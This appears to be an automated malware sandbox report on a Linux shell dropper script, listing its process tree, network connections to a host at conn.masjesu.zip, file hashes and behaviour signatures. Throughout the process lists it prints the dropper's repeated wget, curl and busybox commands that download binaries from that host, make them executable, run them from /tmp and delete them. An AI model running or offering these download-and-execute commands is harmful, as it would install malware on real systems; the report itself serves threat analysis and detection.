[wget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/chmod

[chmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5

[./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/rm

[rm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/chmod

[chmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

[./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/rm

[rm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/chmod

[chmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd

[./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/rm

[rm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/chmod

[chmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX

[./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/rm

[rm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/chmod

[chmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme

[./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/rm

[rm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/chmod

[chmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS

[./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/rm

[rm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/chmod

[chmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G

[./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/rm

[rm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/chmod

[chmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc

[./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/rm

[rm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/chmod

[chmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB

[./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/rm

[rm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/chmod

[chmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N

[./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/rm

[rm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/chmod

[chmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98

[./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/rm

[rm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/chmod

[chmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ

[./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/rm

[rm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/chmod

[chmod 777 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75

[./MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/rm

[rm MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/chmod

[chmod 777 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly

[./PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/rm

[rm PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp

Files

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX

MD5 e1732e70f015e99d14dff1eeeaec9966
SHA1 c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA256 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA512 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7

/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5

MD5 546071c6a6aeff34580b4d1a9b35a7c3
SHA1 dc2de298837a86d3bc86e8a328411229d9eccdb6
SHA256 2d1255033a3f5cde3fb430b15d84ad95c1d7d37b25132cd3dcca7c30963e9f12
SHA512 207f333daf98fe653f4f661defd86651cbb50e3482511769d0558d2fd80ce107ec6a519424e05107740a802b444b62445901788d80dde4e8dbc8ee116d5b9be7

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-28 02:20

Reported

2024-10-28 02:23

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

148s

Max time network

128s

Command Line

[/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh

[/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
N/A 224.0.0.251:5353 udp
US 151.101.1.91:443 tcp
GB 89.187.167.7:443 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-28 02:20

Reported

2024-10-28 02:23

Platform

debian9-armhf-20240611-en

Max time kernel

149s

Max time network

3s

Command Line

[/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh

[/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A